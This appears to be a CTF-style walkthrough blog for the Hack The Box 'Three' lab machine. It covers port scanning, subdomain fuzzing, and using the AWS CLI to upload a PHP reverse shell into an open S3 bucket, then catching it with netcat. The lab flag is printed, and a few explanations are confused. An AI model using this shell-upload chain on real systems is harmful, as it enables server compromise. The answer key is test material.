HTB Labs — Tier 1 — “Three” Machine Walkthrough | By CyberAlp0
Hey Folks, this is CyberAlp0. Back again to a new walkthrough powered by HTB, Tier 1, named “Three”. This machine covers some tasks that will give you a walkthrough into finally finding the flag and solving the machine. This blog will guide you toward solving the tasks one by one and give you a little bit more information and hints regarding each question. These hints will widen your experience and sharpen your mind.
The reason the lab is named “THREE”, is that it covers the S3 buckets of Amazon AWS. s3 bucket is short for “Simple Storage Service”. And, it is a public cloud storage resource available in Amazon Web Services (AWS) platform.
Remember, Learning a thing about everything is much more important than learning everything about one thing.
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my Blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Start Solving the Tasks.
Task 1: How Many TCP Ports are Open in the Machine?
Answer: Number of TCP Ports = 2 Ports
Walkthrough:
we can use the Nmap to find how many TCP Ports are opened in this machine. by typing the following command.
nmap 10.129.253.225
Explainshell is a wonderful Resource for explaining the Linux Command Line. You can use as well for gaining more information about the different flags of Nmap.
Task 2: What is the domain of the email address provided in the “Contact” section of the website?
Answer: thetoppers.htb
Walkthrough:
By visiting the contact page on the website. you will be able to see the email address “mail@thetoppers.htb”. Thus the domain of the email is “thetoppers.htb”
Task 3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses to be able to access the websites that point to those hostnames?
Answer: /etc/hosts
sudo nano /etc/hostsWalkthrough:
The DNS Server is responsible for Domain Name Solving. which means, that instead of typing the IP address of each website you wish to visit, you will just type the domain of the website, and the DNS will take the burden of translating the Domain into an IP to send your request to the target server successfully.
2 types of DNS servers can be configured inside your system. There is a Public DNS server and there is a Local DNS server. An example of a public DNS server is the Google DNS (8.8.8.8). sometimes, we can add a local DNS server, in case it helps us gain access to a specific website whose domain is not registered in the public DNS servers.
The only path where we can find all the configuration files in your system is /etc. There are two paths related to the DNS Config files. The first is in this path /etc/resolv.conf and the other is in this path /etc/hosts.
In case you want to know more or change the DNS servers (Public & Local), Just nano this file (/etc/resolv.conf). In case you want to register a specific IP into the local DNS server, Just nano this file (/etc/hosts).
Remember, You have to be Sudo in order to tamper and make changes into the files.
Once you finish adding the IP of the Domain you want to access using nano, Press Ctrl + X followed by Y to save your changes.
Task 4: Which sub-domain is discovered during further enumeration?
Answer: s3.thetoppers.htb
Walkthrough:
There is a difference between the domain and the subdomain. The domain is when you type (https://www.google.com). The domain here is just Google. Subdomains are created to offer a service that is related and linked to the main domain which is Google like this (https://mail.google.com). In this case, mail is the subdomain under the domain Google.
You can add any number of other domains to the /etc/hosts to be reflected to the local IP of yours “In this scenario, The IP of the machine”.
You can define the sub-domains under the main domain (thetoppers)using lots of tools like wfuzz, ffuf, and gobuster.
In our case, we will be using the gobuster for enumerating the subdomains linked to the domain “thetoppers.htb”. There are lots of tools that we can use for subdomain enumeration like the ffuf and wfuzz.
Followed are the commands that you will be using for each one of the tools. Also, note that we will be trying to fuzz the subdomains using a subdomain list provided by seclists
1- Gobuster
gobuster vhost -u "http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt --append-domain2- wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -u "http://thetoppers.htb" -H "Host: FUZZ.thetoppers.htb" --hw 1036 -t 53- ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" -u http://thetoppers.htbTask 5: Which service is running on the discovered sub-domain?
Answer: amazon s3
Walkthrough:
Amazon Simple Storage Service (S3) is a storage services that offers data availably, security, and performance. Many customers of all sizes can use the Amazon S3 to store and protect data from lots of risks such as data leakage.
Read More: What is Amazon s3?
Task 6: Which command line utility can be used to interact with the service running on the discovered sub-domain?
Answer: awscli (short for: AWS Command Line Interface)
Walkthrough:
In the Previous task, we learned that the running service on the subdomain is the amazon s3, which is mainly used for protecting and storing data against cyber threats. In order to interact with the service running on this subdomain (s3.thetoppers.htb), you may use the command awscli.
awscliRead More: How to configure Amazon Command Line Interface?.
Task 7: Which command is used to set up the AWS CLI installation?
Answer: aws configure
sudo apt install awscli
We should have installed the awscli first before typing “aws configure” command. It is now being downloaded using the command “apt install awscli”. Just press “y” each time you are asked. Or, you could have typed the command “apt install awscli -y” for installing in a stealth mode.
After installing the awscli, type aws configure
aws configure
After configuring the AWS, we will be able to list all the buckets as follows in the next task.
Walkthrough:
The “aws configure” command is the fastest way to set up the AWS CLI installation.
For more information: Configuring AWS CLI.
Task 8: What is the command used by the above utility to list all of the S3 buckets?
Answer: aws s3 ls
Walkthrough:
The Amazon s3 (Simple Storage Service) Buckets are used to store files “AKA Objects”. In AWS Cloud, these objects vary in size from a few bytes to terabytes. One of the main advantages of the s3 Buckets, is its scalability. as you can store an unlimited amount of data in the s3 bucket.
Amazon s3 (Simple Storage Device) can be represented as a balloon. it stretches depending on how much air you fill in it. Amazon s3 is the same scalable as this balloon, it scales to meet your storage needs. You can start storing few amount of data and the storage will increase as you store much more data.
I Recommend reading this blog for more information: AWS s3 Bucket.
To list all of the S3 buckets of the Amazon S3 Service, you will be typing the following command along with the flag ( — endpoint=URL). According to this resource, this option will help you list all of the S3 buckets.
aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htbYou will get the following response
Note: you may face the following error while connecting to the s3 amazon servers.
Could not connect to the endpoint URL: "http://s3.thetoppers.htb/thetoppers.htb?list-type=2&prefix=&delimiter=%2F&encoding-type=url"Connectivity Issue: Could not connect to the endpoint URL: {The URL you are trying to connect}.
Solution: To successfully connect to the AWS s3 Buckets servers, through s3.thetoppers.htb, You shall modify the /etc/hosts, to resolve the s3.thetoppers.htb to the IP address of the machine “THREE”
Task 9: This server is configured to run files written in what web scripting language?
Answer: PHP
Task 10: Submitting The Root Flag of the Machine
Answer: a980d99281a28d638ac68b9bf9453c2b
Walkthrough:
Since the server is configured to read the files that are written in PHP, we will be trying to upload a PHP shell to the server by connecting to the AWS s3 buckets.
we will be using the webshells command in Kali Linux to copy this shell into the server.
Web shells is an executable file that is located in a subdirectory in the path /usr/share. There are many PHP webshells, We will only be using the “php-reverse-shell.php”. we will use the command nano to modify the IP address.
Follow the Following Steps:
Firstly: Get the IP provided to you when you are connected to HTB VPN, By typing ifconfig
Secondly: Modify the /etc/hosts.
We will be replacing the Local IP address “127.0.0.1” with the IP address provided to us when connecting to the VPN of the machine. We will also be changing the Port number to “8888”
Press Ctrl + X followed by Y to save your changes
Now, you have configured the PHP shell. All you have to do is to upload this shell to the server.
Thirdly: Upload the PHP shell to the server
aws s3 --endpoint=http://s3.thetoppers.htb cp php-reverse-shell.php s3://thetoppers.htb
Note: To make sure that the PHP was successfully uploaded, Run the ls command
aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb
Fourthly: Listening to the Connection coming from the PHP shell
We will run Netcat to listen to all the incoming connections coming from the PHP reverse shell on the local IP address we have configured and through port 8888.
nc -lnvp 8888
Fifthly: Capturing the flag of the machine
Now, we have an opened shell inside the server, this allows us to control and execute commands on the server. By navigating the server, we will find that the flag.txt file in the path /var/www
The THREE Machine flag “a980d99281a28d638ac68b9bf9453c2b”
Hope you enjoyed reading my blog about solving Three machine from HTB — Tier 1 — Starting Point Phase.
See You in another write-up!
